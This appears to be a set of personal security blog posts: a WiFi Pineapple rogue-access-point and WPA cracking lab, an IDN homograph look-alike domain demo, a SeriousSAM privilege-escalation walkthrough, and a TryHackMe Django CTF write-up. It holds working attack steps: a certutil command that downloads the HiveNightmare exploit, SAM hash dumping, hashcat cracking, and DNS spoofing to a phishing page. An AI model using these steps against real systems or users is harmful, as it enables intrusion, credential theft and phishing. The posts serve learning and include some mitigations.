I'll be using Hashcat for the cracking on my host machine. Here's a post where I explain why cracking on the host machine is better 😊!

.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force

e46f13faade0:c6adf262679d:Nee2.4:tinkerbell

tinkerbell is the PSK of the network in question

We were successfully able to crack the handshake and retrieve the password to the lab network!

Modules

This section contains information about community modules that can be used on top of the PineAP Attack

Background

The WiFi Pineapple was created with modularity in mind. The WiFi Pineapple supports community-developed modules in addition to the system modules supplied with the WiFi Pineapple, such as Recon, Clients, and PineAP. The WiFi Pineapple API is used by several community-developed modules to expand functionality. This API can be used by anybody to build modules for the WiFi Pineapple.

Modules

Let's take a look at some of the community-made modules in this section!

We'll assume we already got our target to connect to our rogue network beforehand

TcpDump

This module is pretty self-explanatory. It assists us by dumping all network traffic generated by our clients. This module comes in very handy in case when we want to inspect our client's network traffic for some insecure traffic and possibly sniff out some passwords or files that were transferred.

Demo

Hit start and we'll be running

Once done, hit stop and download the capture for analysis

Analysis

We can simply open the capture up with Wireshark and proceed with our analysis.

DWall

DWall is similar to TCPdump, but it focuses on web! DWall display's Plaintext HTTP URLs, Cookies, POST DATA, and images from browsing clients. This has a similar issue to TCPdump. We will only be able to see insecure traffic!

Demo

Hit start listening to start capturing web traffic from clients

As the Clients browse insecure sites, their data would be relayed to us on this page (as shown below)

Client View

Wifi 🍍 View

DNSMasq Spoof

This module forges replies to arbitrary DNS queries using DNSMasq.

Demo

Hit Start to run the spoofer

Add a custom host entry to redirect hosts

I'll be adding a fake entry for example.com. example.com is an actual site that people can access on the web. The real site looks like the following:

Now that we have pointed it to a different IP address containing our "evil portal", let's see what happens to the clients connected to our rogue network.

Live DNS Attack

Here we can see one of the rogue network's clients navigating to example.com but its totally different from what the actual website is. This shows that an attacker/man-in-the-middle is able to easily reply falsely to your DNS queries and this is highly likely to end up as a phishing attack.

PineAP

This section contains information on PineAP and how it can be used

Background

PineAP is a powerful, modular rogue access point suite that helps WiFi auditors collect clients by imitating Preferred Networks. Leveraging PineAP, we are able to see what SSIDs devices are trying to look for. Using that information and PineAP's features, we are able to advertise ourselves as that SSID which the device is looking for.

Example

Let's say you were authenticated to your home network named 4pfHome . Your phone will then try to look for that same SSID when you're outside and have your WIFI on. PineAP will then see this and advertise itself as 4pfHome to your device. If connected, you will be one of Wifi 🍍's many clients, and that's not good. Let's take a look at how it's done!

Live Attack

Prior to launching the attack, the PineAP first has to be set up to listen.

PineAP Setup

Enabling the following options to be able to capture and rebroadcast SSIDs

Broadcast Attack

After letting PineAP do its thing for a while, we are able to see a couple of SSIDs in the SSID Pool .

Now on my devices, I would be able to see these SSIDs being broadcasted and unprotected. (as shown below)

Now once our "target" connects to our network, we own it :) (kind of)

Client Connect back

Clients

We can see that both the devices are connected to the Wifi 🍍 but they are connected under 2 different SSIDs. My laptop thinks it is connected to AndroidAP68A2 and my phone thinks it is connected to Linksys12765_5GHz .

The connected devices won't realize a thing as the Wifi 🍍 is connected to the internet and acts how any other router would.

Now that we have both devices connected to our bogus network, we can use Modules (which will be covered in the next section) to perform various attacks.

This is how we can make use of PineAP to trick users to connect to us.

From my testing, I wasn't able to get the devices to connect to the endpoints automatically. Thus, this attack still depends on the user to make the final decision to connect.

That was an awesome way to get introduced to wireless hacking! I wish to explore more manual options in the near future 🔥!

I have always wondered how malicious attackers register domains that look exactly like the original but have a slight change in the characters used. Mostly Unicode characters. I recently sank some time into figuring out how this attack works with the various characters. I eventually succeeded in my attempts.

I now own ȧpple.com and ḟacebook.com. If you were to open the link on safari or firefox, it would appear how its shown above. However, if you were to open the link with any other chromium browser, you would be seeing the ASCII version of it. Here's what happens in the background and how I did it.

Background

A hostile actor can fool computer users about what distant system they are connecting with via an internationalized domain name (IDN) homograph attack. There are a ton of character look-alikes that can be used to perform such attacks. For example, the a in apple.com can be replaced with the Cyrillic character "а". Or it could even be replaced with the Latin Extended Additional character "ȧ". Which is what I've done in my POC domains. If you're interested, check this out!

Punycode

You may wonder how someone is able to register a domain with Unicode characters. That's where Punycode comes in handy! If you closely inspect the URL on most chromium browsers, you'll notice that I actually registered xn--acebook-js3c.com and xn--pple-pzb.com.

The characters ȧ and ḟ are seen as Unicode characters. Punycode is a Unicode encoding that uses just the ASCII character set for Internet hostnames. And this is also what allows someone to register a domain with Unicode characters.

In action

Let's take a look at how various browsers process the Punycode (by default)

Firefox

Safari

Brave/Chrome

Conclusion

Most chromium-based browsers seem to have fixed this "issue" by displaying the ASCII version and not processing the Punycode. However, Firefox and Safari don't seem to do this by default. At least from my testing. There might be more browsers I'm unaware of that do this.

Impact

If you're reading this, you are definitely will be able to pick out the difference and catch this. Its the general public we have to be worried about. This attack creates a lot of possibilities for phishing attacks. From a distance, people might not be able to tell the difference and end up giving up their credentials.

Fix

The most obvious answer would be to use a password manager. Password managers associate the domains with your credentials. This stops a look-alike domain from stealing your credentials!

The temporary solution for Firefox users would be to head to About -> Config and set network.IDN_show_punycode to True . This would ensure that Firefox shows the same URL as other chromium browsers!

POC

Access these links on Firefox/Safari to see the effect!

http://ȧpple.com/

http://ḟacebook.com/

For those interested

[Steps to reproduce]

• Purchase a domain name. Specifically an ASCII version of "ȧpple.com" which turns out to be "xn--pple-pzb.com"
• Setup DNS records and point it to a server hosting a static site.
• Launch the latest version of Firefox and Browse to "xn--pple-pzb.com"

[Actual Results]

• Firefox processes "xn--pple-pzb.com" in the address bar and displays the Unicode version, "ȧpple.com" in the address bar to the end-user.

SeriousSAM is a CVE which allows non privileged users to read registry and sensitive data. Users are then able to elevate their privileges using the obtained data. This vulnerability has exists in windows based machines for the longest time. It was just never uncovered till 20th of July 2021. I'll be exploiting the Elevation of Privilege Vulnerability in my own lab environment!

Executive Summary

An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. An attacker must have the ability to execute code on a victim system to exploit this vulnerability.

Link to Microsoft's post.

Prerequisites

There are certain prerequisites that have to be met in order for the attack to exploit this vulnerability. The vulnerability exists in the Volume Shadow Copy Service (VSS) AKA System Restore Points and the insecure SAM file permissions.

System Protection

System Protection has to be enabled for at least the C:/ drive. Has to be done by the administrator of the machine.

Restore Point

A restore point has to exist on the target machine. Has to be done by the administrator of the machine.

Privilege Escalation

Now lets assume we have an initial shell on the box as a low privilege user. This is how we would go about getting those hashes which we can then pass around 😉.

Transfer Malicious Executable

I'll be utilizing this repository by Kevin Beaumont to exploit this vulnerability. The latest version of the executable (as of writing this) can be downloaded from here.

C:\Users\user\Desktop\SeriousSAM>certutil -urlcache -f https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe HiveNightmare.exe

Run exploit

Running the executable successfully dumps out the SAM, SECURITY and SYSTEM files.

C:\Users\user\Desktop\SeriousSAM>HiveNightmare.exe

Dumping Hashes

Using CredDump7 we are able to dump the user accounts' hashes for further use.

┌──(root💀4pfsec)-[~/projects/seriousSam] └─# /opt/creddump7/pwdump.py SYSTEM-2021-06-13 SAM-2021-06-13

We were able to successfully dump the hashes from the target machines which we can then use to perform a Pass the Hash attack with psexec.

Workaround / Temporary Patch

By Microsoft.

Restrict access to the contents of %windir%\system32\config

Command Prompt (Run as administrator): icacls %windir%\\system32\\config\\*.* /inheritance:e

Windows PowerShell (Run as administrator): icacls $env:windir\\system32\\config\\*.* /inheritance:e

Delete Volume Shadow Copy Service (VSS) shadow copies

1. Delete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\system32\config.
2. Create a new System Restore point (if desired).

Impact of workaround Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications. For more information on how to delete shadow copies, see KB5005357- Delete Volume Shadow Copies.

Note You must restrict access and delete shadow copies to prevent exploitation of this vulnerability.

There's also a bunch of updates for the various versions of windows over on this page (at the bottom).

I recently picked up the basics of flask and have been wanting to learn Django. Here's my go @ it with the help of TryHackMe! Django is a high-level Python web framework that enables the rapid development of secure and maintainable websites. It allows you to develop websites and web applications in a matter of hours.

Django can automatically compile HTML code, therefore making it possible for anyone without any advanced knowledge in markup languages to develop a website. Additionally, Django is arguably one of the most secure developing frameworks, which in the right configuration, can strongly resist SQL injections and XSS.

In terms of penetration testing, it's critical to grasp the basic structure of Django-powered websites in order to spot potential flaws and developer errors.

All Source Files

Getting Started

Here's how to get started with Django on your local machine!

Installing Django

┌──(root💀4pfsec)-[~/boxes/thm/django] └─# pip3 install Django==2.2.12

Creating new Project

┌──(root💀4pfsec)-[~/boxes/thm/django] └─# django-admin startproject site_4pfsec

Configure created Project

manage.py is a command-line utility that lets you interact with your Django project in various ways. It is especially handy in creating web apps, managing databases, and most importantly running the server.

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# ls manage.py site_4pfsec

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py migrate

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# ls db.sqlite3 manage.py site_4pfsec

Run Django Server

The basic syntax for using this utility is python3 manage.py {command}

Modify Bind Host

Modify line 28. Add 0.0.0.0 and 127.0.0.1
~/django/site_4pfsec/site_4pfsec/settings.py

runserver

Runserver is the most important command used with manage.py. It allows you to deploy your website on the server. Django has a wonderful feature that allows you to instantly see changes made on the website without restarting it. (It is only necessary to restart runserver command when adding a new app).

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py runserver 0.0.0.0:8000

createsuperuser

This command allows you to create an admin account for your Django web admin panel.

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py createsuperuser

Django Admin Panel

0.0.0.0:8000/admin
This URL can be used to access Django web admin panel.

startapp

Startapp allows you to initialize an app for your project. Django projects can have an infinite number of apps.

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py startapp slatt

Creating a Site

let's go ahead and create a very simple app.

Modify settings.py

INSTALLED_APPS = [ 'slatt', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ]

Modify urls.py

from django.contrib import admin from django.urls import path, include

urlpatterns = [ path('slatt/', include('slatt.urls')), path('admin/', admin.site.urls), ]

App Directory

There are a couple files that need to be created in here for the app to work!

urls.py

from django.urls import path from . import views

app_name = 'slatt' urlpatterns = [ path('', views.index, name='index'), ]

views.py

from django.shortcuts import render from django.http import HttpResponse

Create your views here.

def index(request): return HttpResponse("Hello, World!")

Running App

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py migrate

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py runserver 0.0.0.0:8000

Rendering Templates with Django

Django is able to automatically generate HTML markdown if properly told so. Templates are the ones who help us with that.

Templates

Create a template subdirectory in the app directory to hold all of our templates.

Base.html

<!DOCTYPE html> {% block title %}Slatt{% endblock %}

{% block content %} {% endblock %}

index.html

{% extends 'base.html'%}

{% block content %}

Hello world! -Nee!

{% endblock %}

views.py

from django.shortcuts import render from django.http import HttpResponse

Create your views here.

def index(request): return render(request, 'index.html')

Running App

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py migrate

┌──(root💀4pfsec)-[~/boxes/thm/django/site_4pfsec] └─# python3 manage.py runserver 0.0.0.0:8000

CTF

Target host = 10.10.131.20
Target Port = 8000
Target Username = django-admin
Target Password = roottoor1212

Browsing to the host on that port returned a disallowed error as shown below.

I was able to log in to the server via SSH with the given credentials.

Since I had access to the server, I modified the ALLOWED_HOSTS list in settings.py

django-admin@py:~/messagebox/messagebox$ nano settings.py

That modification led me into the application as shown below.

Exploring messages returned the following.

Admin panel flag?

Since I had access to the server, I used the createsuperuser command to create my own user to be able to login to the Admin panel.

django-admin@py:~/messagebox$ python3 manage.py createsuperuser

http://10.10.131.20:8000/admin/

With that, I was able to login to the admin panel as shown below.

Browsing to http://10.10.131.20:8000/admin/auth/user/ reveals the flag and some other interesting information as shown below!

User flag?

The previous challenge gave us a new username and a password hash.

Username: StrangeFox
Password hash: https://pastebin.com/nmK---

Using https://toolz.4pfsec.com/hashId/ I was able to detect the hash as shown below.

SHA-256 [Hashcat Mode: 1400]

Since I knew it was a SHA-256 hash, I used hashcat mode 1400 to go ahead and crack it.

.\hashcat.exe -m 1400 .\hashes\djangoCtf.txt .\wordlists\mylist.txt --force

c06029563b2765020613f5bf79fc528344ffa039ef1483d0c390786d8010c630:WildNature
Target User = StrangeFox
Target User's Password = WildNature

Knowing the credentials, I switched to that user.

su StrangeFox WildNature

Hidden flag?

Knowing that the flag would be on the machine, I grep-ed recursively throughout the FS to find the flag. (as shown below)

StrangeFox@py:/$ cd / StrangeFox@py:/$ grep -Hr "THM{"

Conclusion

With that, this room has successfully taught me the basics of Django and how to use it against devs! Hope it helped you in some way 😏!